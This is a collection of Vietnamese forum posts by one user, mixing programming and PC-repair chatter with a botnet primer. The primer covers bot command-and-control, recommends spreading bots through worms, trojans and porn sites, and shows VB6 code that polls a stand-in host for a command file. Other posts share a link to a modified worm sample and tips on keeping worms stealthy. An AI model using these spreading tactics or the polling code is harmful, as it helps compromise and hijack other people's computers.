Messages posted by: danvac

Đang muốn giải nghệ về quê cưới vợ thì gặp bài này nên phải nhảy lại smilie

)

Viết virus thì vb là không lý tưởng vì các yếu tố như các anh đã nói
Tuy nhiên nếu dùng vb viết các giống sâu bọ kiểu Việt Nam thì vb là nhất vì nó là ngôn ngữ thực dụng...
Tớ viết Sâu bọ thì chú trọng vào sự nhỏ gọn + tính bí mật nên không làm những cái gây sự chú ý như mã hóa, disable, nhân bản....
Tùy các bạn viết thế nào thì viết quan trọng là Tính hiệu quả + Ý tưởng độc đáo + Đam mê thì dù là vb què cũng có thể thắng đ.c dân C++ đỉnh cao mà thiếu các tính chất kia...
Vài dòng tham khảo smilie

format win đi sau đó dùng hiren boot quết virus trong dos đi

chào các bác các bác có kinh nghiệm làm lập trình rồi cho hỏi ké là khi mình làm về lập trình web thì họ thường bắt mình làm gì ( cho ví dụ) để tui còn biết mà đỡ trước smilie

vb.net dễ học hơn đặc biệt trong trường hợp bạn đi lên từ vb6 smilie

winrar down ở www.winrar.com
@Ha trung Hoa bạn down cả phần mềm về giải nén sẽ thấy nóa

cho tôi hỏi ké với
tôi học xong trường trung cấp ESTIH rùi và có khá kiến thức vế asp.net thì có thể đi xin việc về lập trình ASP.net được không và tôi cần những gì
thx

cảm ơn pác nhưng pác cười to làm em tẽn tò que >"<

các bác cho em hỏi thêm về lập trình visual basic 6.0 nhé
thứ nhất là cần học những gì
thứ 2 là liệu có ổn đình và lâu dài không
thứ 3 là xin việc ở đâu và như thế nào vậy
thx các pác nhiều

Giới thiệu :

T2 AutoShutdown là phần mềm giúp bạn hẹn giờ tắt máy hoặc thực hiện tắt máy nhanh mà không ảnh hưởng đến hệ thống .

TAS - rất cần thiết khi phải đợi máy tính làm một công việc nào đó mà không phải đợi máy thực hiện xong công việc, tính năng này windows các phiên bản chưa hỗ trợ .

TAS Hỗ trợ tiếng việt 100 % ,miễn phí và không cần cài đặt .
Các chức năng chính :

Tự động tắt máy (Shutdown) - thực hiện tắt máy nhanh .- tính năng này đều không cảnh báo người dùng trước khi thực hiên .
Tự động ngủ đông (Hibenate) - thực hiện ngủ đông - lặp lại chú ý với các tính năng khác .
Thực hiện Stand By - cũng có thể hẹn giờ với chức năng này
Log Off - có hẹn giờ
Khóa máy tính (Lock Computer) - có hẹn giờ
Khởi động lại (Restart) - có hẹn giờ
Hẹn giờ hiển thị một hộp tin nhắn
Play Media - Tự động chơi một bạn nhạc hoặc mở một chương trình bất kỳ .

Các chức năng mở rộng : Đóng mở ổ CD ( nếu máy tính có nhiều ổ thì mở tại ổ đầu tiên của máy ) : bấm vào Menu Action và chọn hành động bạn muốn .

About : VietSource phát triển trên mã nguồn miễn phí của: Vu Dang Doanh, student of 45TH2 class, IT, Nha Trang University, Khanh Hoa state, Viet Nam. Liên hệ : vdoanh007@yahoo.com

Phần mềm có xử dụng bộ Control UniCode Viettype.ocx của tác giả Phạm Văn Trung , Giáo viên trường THPT Bình Phú Tx .Thủ Dầu Một Tỉnh Bình Dương .Liên hệ : phamtrung@gmail.com

About VietSource :

Contact : Lonely_Hero88@yahoo.com hoặc danvac_la_anh@yahoo.com
Home : www.truongton.110mb.com
Forum : www.khungtroixua.net

Download :
http://www.box.net/shared/blfc2mckgg
[URL="http://www.box.net/shared/wwh0zl6gwg"]mã nguồn
[/URL]

cả nhà góp ý cho tui nhá ^_^ thx

con này có kích thước 56 kb
real worm 60 kb
cách tự vệ giống nhau
ngôn ngữ lập trình giống nhau
icon khác nhau
con này là realworm nhưng có sửa chữa khá nhiều
ok

tham khảo
http://khungtroixua.net/diendan/showthread.php?p=3228#post3228
phần mềm + hướng dẫn
http://www.box.net/shared/jdy8azpss8

cần chuẩn bị thêm máy tính thật tốt để virus nó ăn dần máy tinh smilie

Copy writer còn được gọi là nhân viên "viết lời quảng cáo". là một nghề rất mới và có nhiều triển vọng
mời các anh em HVA cùng tham gia thảo luận về nghề để tớ được mở rộng tầm mắt smilie

IBM là tốt nhất bác ạ,chủ yếu là bác mua ở nơi đáng tin cậy,đừng để bọn nó lừa phải hàng tàu thôi!
smilie

) bây giờ 99 % dùng hàng tàu kím cái ko tàu khó lém smilie

)
có thể liên hệ
với mình giá tầm 200 k
ok mình ở hn nick
danvac_la_anh
bb

máy tính của mình từ trước vẫn boot được mà smilie

nếu bạn nào có vấn đề về virus thì nên up mẫu lên để bọn mình xem còn cứ hỏi "làm thế nào để diệt thì chỉ có trả lời : mua av "

bạn upload mẫu lên đi tôi sẽ giup smilie

vào win thì được mà
mình dùng đĩa win thì boot được mà hiren thì ko được (thay nhiều rồi )
có phải lỗi phần cứng ko vậy smilie

bạn ơi còn cái của tôi thì không thể nào boot bằng cd được ( tôi đã đặt chế độ đó rồi mà )
hiện tượng : mỗi lần nhết đĩa boot vào ( hiren boot 9.2 .........) thì hiện lên 2 cái boot bằng hard disk và cd - room nhưng boot bằng đĩa cứng thì được mà boot bằng cd thì chỉ mang ra cái màn hình đen xì
đó có phải lỗi của ổ đĩa ko vậy
help

cho mình hỏi tý nếu mình đang ghost mà bị mất điện thì có bị hai gì ko smilie

(
khắc phục thế nào
mà máy nhà mình bị ẩn đi mấy partition mình phải làm thế nào bi giờ

( vì nó lây mạnh qua nên em định viết 1 tools để fix con này nhưng có cái khó là nó dùng gì gì đó ( hình như regedit) để vô hiệu hóa tack manager regedit v..vv. có bác nào biết cách xóa nó ( bằng visual basic 6.0 thì càng tốt) thì giúp em nhá smilie

hay đó

bài đầu tay có gì sơ suất xin được lượng thứ
Kiến thức cơ bản về botnet
Các chương ;
A – các định nghĩa
B- Phát tán bot như thế nào
C – Phân tích một bot
1, a,b,c định nghĩa :
A – Botnet là gì : là những chương trình tương tự Trojan backdoor cho phép kẻ tấn công sử dụng máy của họ như là những Zoombie ( máy tính thây ma – máy tính bị chiếm quyền điều khiển hoàn toàn ) v à chúng chủ động kết nối với một Server để dễ dàng điều khiển , các bạn lưu ý chữ “chủ động” đó là một đặc điểm khác của bot so với trojan backdoor . Chính vì sự chủ động này mà máy tính bị cài đặt chúng kết nối trở nên chậm chạp , một đặc điểm giúp ta dễ dàng nhận diện bot .

B – tại sao gọi là mạng botnet : mạng botnet là một mạng rất lớn gồm hàng trăm hàng ngàn máy tính Zombie kết nối với một máy chủ mIRC ( Internet Replay Chat )
hoặc qua các máy chủ DNS để nhận lệnh từ hacker một cách nhanh nhất . Các mạng bot gồm hàng ngàn “thành viên” là một công cụ lý tưởng cho các cuộc chiến tranh đọ máu như DDOS , spam, cài đặt các chương trình quảng cáo …..

C – mIRC hay DNS :
- mIRC là một hình thức chat có trước yahoo meseger trước đây thường được các botmaster sử dụng riêng tôi thì tôi thích sử dụng các bot chạy trên nền web hơn (
DNS - Domain Name Server ) - vì ngay cả khi ta online hay offline thì chúng vẫn hoạt động
– dễ dàng điều khiển phù hợp với điều kiện VN .

- Note :
trước đây do bot luôn có khả năng lây lan nên còn được gọi là BOTNET – WORM nhưng hiện nay chức năng này được gỡ bỏ vì hai lý do sau
+ Bot dễ bị lộ : Trong khi mục tiêu của botmaster là phục kích lâu dài
+ Kích thước của worm lớn dễ bị Fire Wall chặn dễ phát hiện khó lây lan , =>bot thường được tải xuống bởi 1 chú worm hoặc nguỵ trang bằng một trojan tuỳ theo trình độ , tư duy của botmaster .
=> Theo tôi worm và botnet nên tách rời nhau ra
B- Phát tán bot như thế nào
Các botmaster thường phát tán bot theo những cách như sau
1-Sử dụng một con worm tải bot xuống và kích hoạt chúng (ta đã biết là worm lây lan rất mạnh )
2- Gắn bot vào một trojan nói theo cách dễ hiểu nhất là gửi các chương trình bị lây nhiễm bởi bot cho các nạn nhân và tự họ sẽ kích hoạt chúng
3 - Gắn nó lên một trang web nhiều người truy câpj ( thường là các trang web sex :X vì số lượng người tham gia rất lớn )
4- Kết hợp các 1 với 2 hoặc 4 (gắn worm vào trojan hoặc web)
Chú ý : cách lây lan thứ 3 là hay nhất ( tuy có gian hung một chút )vì với cách thứ nhất là dung worm thì rất dễ bị lộ cách thứ 3 thì ko được nhiều , cách thứ 4 thì tạm được
C – Phân loại bot
- Theo cách điêur khỉên botnet được chia làm hai loại
+ DNS Bot : điều khiển qua nền web, nguyên tắc hoạt động như sau : đầu tiên tại host điều khiển botmaster sẽ tại một tệp lệnh.txt sau đó bot sẽ download tệp này, tiến hành phân tích và thực hiện yêu cấu của người viết.
-Ưu đỉêm : Thực hiện dễ dàng viết và điều khỉên đơn giản chỉ cần một host bất kỳ là có thể điều khiển được , bot thực hiện lệnh được công việc ngay cả khi chủ bot online hay offline .
-Nhược đỉêm : tốc độ xử lý chậm (do phải mất công cho cả download và upload ) – không có sự trao đổi qua lại giữa chủ bot và zombie .
+ mIRC : điều khiển qua các mạng chat mIRC : ta đã biết là tại hình thức chat Internet Replay Chat, một chương trình có thể tuỳ ý đăng ký và sử dụng một nick name mà không cần phải đăng ký , lợi dụng lỗ hổng này bot mIRC sử dụng chúng để hoạt đông .Nguyên tắc như sau : bot sẽ sử dụng winsock gửi các tệp lệnh IRC để nhận lệnh từ hacker qua một port đã định sẵn khi cấu hình bot cần lưu ý đến Chanel ( gọi tắt là Chan), Port (mặc đinh là 6667), máy chủ Mirc ( thường mở đầu bằng irc.)
- Các bạn có thể tham khảo vấn đề này kỹ hơn tại
www.ryan1918.com
trang web hang đầu về botnet .
D - Mổ xẻ một bot
Trong bài này vì kiến thức có hạn tôi sẽ chỉ phân tích 1 bot chạy trên nền web có tên là vnbot được viết bằng ngôn ngữ visual basic 6.0 để các bạn hiểu them

đầu tiên là phân tích hàm API sau

Khai báo :

Private Declare Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long

Đây là một hàm API sử dụng thư viện hàm của windows

Xử dụng
‘tạ tạo một timer với tên mặc định là timer1 và thuộc tính interval là 60000 (tương đương ‘1 phút )
‘trong sự kiện timer nhập đoạn mã sau vào

Timer1_Timer ()
Call URLDownloadToFile(0&, “http://ww.hótban.com/host.txt”, “C:\test.txt”, &H10, 0&)
‘hàm này có tác dụng là download tệp lệnh về đoạn mã sau có tác dụng đọc chương trình ‘cần chạy

open “c:\test.txt” for input as #1 ‘ Mo theo che do chi doc – Tai cong là #1
line input #1, id ‘ Doc dong dau tien
msgbox id ‘ hien thi ket qua
close #1
‘đóng lại
End sub
‘Ket thuc
2 đoạn mã này có tác dụng đọc và hiển thị kết quả chúng ta mong muốn thông qua net .

nhà mình có ai biết nhiều về con sâu STORM và BOTNET không?
mình đọc trên mạng thấy nói nhiều về nó nhưng không hiểu cụ thể là như thế nào? nó nguy hiểm như thế nào? cách lây lan ra sao? và làm sao biết máy mình bị nhiễm (bắt cóc?).

botnet

1 mạng lưới gồm hàng ngàn máy tính được xử dụng chung 1mucj đích ví dụ ddos

sâu STORM

1 botnet -worm sử dụng 1 kỹ thuật mass mail đặc biệt nên lây lan cực mạnh kỹ thuật này bạn cứ hỏi admin vietvirus.info (dungcoi_vb) thì hắn nói cho tôi ko được nhiều lời như hắn smilie

và làm sao biết máy mình bị nhiễm (bắt cóc?).

tốc độ vào mạng rất chậm smilie

-))
bạn vào trang
www.ryan1918.com
tìm với từ khóa storm worm
nghe giang hồ đồn tác giả con nài có chân tại trang nài smilie

:wink: ồ cảm ơn bạn vì những cuốn sách bạn đã làm

chào bạn
mình đã gửi cái links down e-book trên 1 số diễn đàn về khoa học huyền bí và họ đánh giá cao sự công phu của bạn
bạn có thể gửi sách cho mình ko mình sẽ up giùm lên host của minh
thanks

đầu tiên mình cảm ơn bạn vì đã hồi âm cho mình để mình viết bài tốt hơn nữa ^^

Mà hình như các tác giả worm bây giờ kô dùng loại Autorun tạo ra 2 chữ đậm ấy nữa đâu bạn danvac thân mến ạ Hình như autorun bây giờ toàn toàn ăn cắp của Tàu(hoặc là có nguồn gốc từ Tàu) nên mấy chữ đó toàn lằng ngoàng do bị lỗi font mà là mấy dòng loàng ngoằng chứ kô phải chỉ một dòng nên còn chẳng thấy

nếu kích chuột phải thấy loẳng ngoẳng càng hay
[/url]

Thêm một chi tiết nữa là autorun có thể làm virus được kích hoạt ngay cả khi ta chọn dòng Open hoặc Explorer trên menu ấy.

thật kô đấy thằng viết worm chắc là thiên tài rồi

Chương trình liệt kê các phần mềm đăng ký khởi động cùng windows dung dấu kiểm bỏ chọn các chương trình mà bạn nghi ngờ ở đây là 1. exe , shel. , Exe vbkey……

đúng là bài đó có ghi cách đăng ký nhưng ko có nếu ra cách tìm worm trong msconfig smilie

Cám ơn bạn đã cho tui một trận cười sảng khoái có thể tối tôi sẽ đọc kỹ hơn và có ý kiến thêm

Tối: thôi kô nói gì nữa kô nên vùi dập những con người có tâm huyết cống hiến như thế

nếu bạn có lý đúng thì nên nêu ra cho tôi học thêm tôi cũng là newbie chỉ có kinh nghiệm làm thịt mấy con worm vớ vẩn nên chả biết gì smilie